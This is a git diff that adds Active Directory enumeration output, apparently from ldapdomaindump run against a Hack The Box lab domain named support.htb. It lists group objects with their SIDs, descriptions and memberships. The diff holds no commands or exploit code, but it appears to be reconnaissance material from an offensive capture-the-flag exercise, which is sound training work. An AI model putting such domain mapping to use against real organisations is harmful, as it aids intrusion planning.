+<tr><td>Guests</td><td>Guests</td><td>&nbsp;</td><td>Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted</td><td>05/28/22 11:01:56</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-32-546">546</abbr></td></tr>
+<tr><td>Users</td><td>Users</td><td>&nbsp;</td><td>Users are prevented from making accidental or intentional system-wide changes and can run most applications</td><td>05/28/22 11:01:56</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-32-545">545</abbr></td></tr>
+<tr><td>Administrators</td><td>Administrators</td><td>&nbsp;</td><td>Administrators have complete and unrestricted access to the computer/domain</td><td>05/28/22 11:01:56</td><td>05/28/22 11:19:47</td><td><abbr title="S-1-5-32-544">544</abbr></td></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/domaindump/domain_groups.json b/support/domaindump/domain_groups.json
new file mode 100644
index 0000000..e4ddf68
--- /dev/null
+++ b/support/domaindump/domain_groups.json
@@ -0,0 +1,3142 @@
+[{
+ "attributes": {
+ "cn": [
+ "Shared Support Accounts"
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=Shared Support Accounts,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "member": [
+ "CN=support,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Shared Support Accounts"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{a6e65275-b8d8-4609-abc6-0059d0665017}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1103"
+ ],
+ "sAMAccountName": [
+ "Shared Support Accounts"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12635
+ ],
+ "uSNCreated": [
+ 12599
+ ],
+ "whenChanged": [
+ "2022-05-28 11:12:04+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:11:32+00:00"
+ ]
+ },
+ "dn": "CN=Shared Support Accounts,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "DnsUpdateProxy"
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "description": [
+ "DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers)."
+ ],
+ "distinguishedName": [
+ "CN=DnsUpdateProxy,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "name": [
+ "DnsUpdateProxy"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{c6a0cf35-7598-4656-a0d1-349bdbb7072f}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1102"
+ ],
+ "sAMAccountName": [
+ "DnsUpdateProxy"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12492
+ ],
+ "uSNCreated": [
+ 12492
+ ],
+ "whenChanged": [
+ "2022-05-28 11:05:17+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:05:17+00:00"
+ ]
+ },
+ "dn": "CN=DnsUpdateProxy,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "DnsAdmins"
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "description": [
+ "DNS Administrators Group"
+ ],
+ "distinguishedName": [
+ "CN=DnsAdmins,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483644
+ ],
+ "instanceType": [
+ 4
+ ],
+ "name": [
+ "DnsAdmins"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{756aaeda-6583-46f0-ae22-0871e56fc790}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1101"
+ ],
+ "sAMAccountName": [
+ "DnsAdmins"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "uSNChanged": [
+ 12489
+ ],
+ "uSNCreated": [
+ 12487
+ ],
+ "whenChanged": [
+ "2022-05-28 11:05:17+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:05:17+00:00"
+ ]
+ },
+ "dn": "CN=DnsAdmins,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Enterprise Key Admins"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Members of this group can perform administrative actions on key objects within the forest."
+ ],
+ "distinguishedName": [
+ "CN=Enterprise Key Admins,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483640
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Enterprise Key Admins"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{96c375f9-3eb9-4692-aa27-3b693ba39495}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-527"
+ ],
+ "sAMAccountName": [
+ "Enterprise Key Admins"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13075
+ ],
+ "uSNCreated": [
+ 12453
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Enterprise Key Admins,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Key Admins"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Members of this group can perform administrative actions on key objects within the domain."
+ ],
+ "distinguishedName": [
+ "CN=Key Admins,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Key Admins"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{ae49ef96-4279-4ad0-ac24-eec26bfd58ca}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-526"
+ ],
+ "sAMAccountName": [
+ "Key Admins"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13072
+ ],
+ "uSNCreated": [
+ 12450
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Key Admins,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Protected Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information."
+ ],
+ "distinguishedName": [
+ "CN=Protected Users,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Protected Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{ccba6359-4618-4d71-81be-cb85b2e8a30d}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-525"
+ ],
+ "sAMAccountName": [
+ "Protected Users"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12447
+ ],
+ "uSNCreated": [
+ 12445
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Protected Users,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Cloneable Domain Controllers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group that are domain controllers may be cloned."
+ ],
+ "distinguishedName": [
+ "CN=Cloneable Domain Controllers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Cloneable Domain Controllers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{b9db8fea-424a-4556-84d6-1b18849d02ec}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-522"
+ ],
+ "sAMAccountName": [
+ "Cloneable Domain Controllers"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12442
+ ],
+ "uSNCreated": [
+ 12440
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Cloneable Domain Controllers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Enterprise Read-only Domain Controllers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group are Read-Only Domain Controllers in the enterprise"
+ ],
+ "distinguishedName": [
+ "CN=Enterprise Read-only Domain Controllers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483640
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Enterprise Read-only Domain Controllers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{4712ff52-f03e-40bd-ad4f-77a470fb3537}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-498"
+ ],
+ "sAMAccountName": [
+ "Enterprise Read-only Domain Controllers"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12431
+ ],
+ "uSNCreated": [
+ 12429
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Enterprise Read-only Domain Controllers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Read-only Domain Controllers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Members of this group are Read-Only Domain Controllers in the domain"
+ ],
+ "distinguishedName": [
+ "CN=Read-only Domain Controllers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Read-only Domain Controllers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{60b921a3-973d-4ea8-a1c2-7a800cbdc960}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-521"
+ ],
+ "sAMAccountName": [
+ "Read-only Domain Controllers"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13089
+ ],
+ "uSNCreated": [
+ 12419
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Read-only Domain Controllers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Denied RODC Password Replication Group"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain"
+ ],
+ "distinguishedName": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483644
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Read-only Domain Controllers,CN=Users,DC=support,DC=htb",
+ "CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb",
+ "CN=Domain Admins,CN=Users,DC=support,DC=htb",
+ "CN=Cert Publishers,CN=Users,DC=support,DC=htb",
+ "CN=Enterprise Admins,CN=Users,DC=support,DC=htb",
+ "CN=Schema Admins,CN=Users,DC=support,DC=htb",
+ "CN=Domain Controllers,CN=Users,DC=support,DC=htb",
+ "CN=krbtgt,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Denied RODC Password Replication Group"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{ab817e25-ea74-4304-b9df-a0259904d719}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-572"
+ ],
+ "sAMAccountName": [
+ "Denied RODC Password Replication Group"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "uSNChanged": [
+ 12433
+ ],
+ "uSNCreated": [
+ 12405
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Allowed RODC Password Replication Group"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members in this group can have their passwords replicated to all read-only domain controllers in the domain"
+ ],
+ "distinguishedName": [
+ "CN=Allowed RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483644
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Allowed RODC Password Replication Group"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{45a9d873-2408-4fd5-bb90-e0fdafde6aaf}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-571"
+ ],
+ "sAMAccountName": [
+ "Allowed RODC Password Replication Group"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "uSNChanged": [
+ 12404
+ ],
+ "uSNCreated": [
+ 12402
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Allowed RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Terminal Server License Servers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage"
+ ],
+ "distinguishedName": [
+ "CN=Terminal Server License Servers,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Terminal Server License Servers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{54ac77f0-d469-4c1b-b8c9-806b35d0bfc4}"
+ ],
+ "objectSid": [
+ "S-1-5-32-561"
+ ],
+ "sAMAccountName": [
+ "Terminal Server License Servers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12377
+ ],
+ "uSNCreated": [
+ 12375
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Terminal Server License Servers,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Windows Authorization Access Group"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects"
+ ],
+ "distinguishedName": [
+ "CN=Windows Authorization Access Group,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=support,DC=htb"
+ ],
+ "name": [
+ "Windows Authorization Access Group"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{5487a661-0e1c-4101-84f7-5479095d3165}"
+ ],
+ "objectSid": [
+ "S-1-5-32-560"
+ ],
+ "sAMAccountName": [
+ "Windows Authorization Access Group"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12396
+ ],
+ "uSNCreated": [
+ 12372
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Windows Authorization Access Group,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Incoming Forest Trust Builders"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group can create incoming, one-way trusts to this forest"
+ ],
+ "distinguishedName": [
+ "CN=Incoming Forest Trust Builders,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Incoming Forest Trust Builders"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{c61828b5-11ad-4030-8762-22da7e66ef05}"
+ ],
+ "objectSid": [
+ "S-1-5-32-557"
+ ],
+ "sAMAccountName": [
+ "Incoming Forest Trust Builders"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12371
+ ],
+ "uSNCreated": [
+ 12369
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Incoming Forest Trust Builders,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Pre-Windows 2000 Compatible Access"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "A backward compatibility group which allows read access on all users and groups in the domain"
+ ],
+ "distinguishedName": [
+ "CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=support,DC=htb"
+ ],
+ "name": [
+ "Pre-Windows 2000 Compatible Access"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{5b505648-8271-43a5-90ef-4060ed68c739}"
+ ],
+ "objectSid": [
+ "S-1-5-32-554"
+ ],
+ "sAMAccountName": [
+ "Pre-Windows 2000 Compatible Access"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12393
+ ],
+ "uSNCreated": [
+ 12366
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Account Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Members can administer domain user and group accounts"
+ ],
+ "distinguishedName": [
+ "CN=Account Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Account Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{4642e074-f318-4afd-af18-184070c149c7}"
+ ],
+ "objectSid": [
+ "S-1-5-32-548"
+ ],
+ "sAMAccountName": [
+ "Account Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 13083
+ ],
+ "uSNCreated": [
+ 12363
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Account Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Server Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Members can administer domain servers"
+ ],
+ "distinguishedName": [
+ "CN=Server Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Server Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{d1186a0c-1a06-4928-8696-c59c33b4f37a}"
+ ],
+ "objectSid": [
+ "S-1-5-32-549"
+ ],
+ "sAMAccountName": [
+ "Server Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 13078
+ ],
+ "uSNCreated": [
+ 12360
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Server Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "RAS and IAS Servers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Servers in this group can access remote access properties of users"
+ ],
+ "distinguishedName": [
+ "CN=RAS and IAS Servers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483644
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "RAS and IAS Servers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{ad87386b-bd1b-4783-9307-e0659bebe5ce}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-553"
+ ],
+ "sAMAccountName": [
+ "RAS and IAS Servers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "uSNChanged": [
+ 12359
+ ],
+ "uSNCreated": [
+ 12357
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=RAS and IAS Servers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Group Policy Creator Owners"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members in this group can modify group policy for the domain"
+ ],
+ "distinguishedName": [
+ "CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Administrator,CN=Users,DC=support,DC=htb"
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Group Policy Creator Owners"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{6e67f957-2c8a-4274-9163-489793879786}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-520"
+ ],
+ "sAMAccountName": [
+ "Group Policy Creator Owners"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12391
+ ],
+ "uSNCreated": [
+ 12354
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Domain Guests"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "All domain guests"
+ ],
+ "distinguishedName": [
+ "CN=Domain Guests,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "memberOf": [
+ "CN=Guests,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "Domain Guests"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{8d4e8816-2dd6-4ef3-99f0-e26685df13f2}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-514"
+ ],
+ "sAMAccountName": [
+ "Domain Guests"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12353
+ ],
+ "uSNCreated": [
+ 12351
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Domain Guests,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Domain Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "All domain users"
+ ],
+ "distinguishedName": [
+ "CN=Domain Users,CN=Users,DC=support,DC=htb"
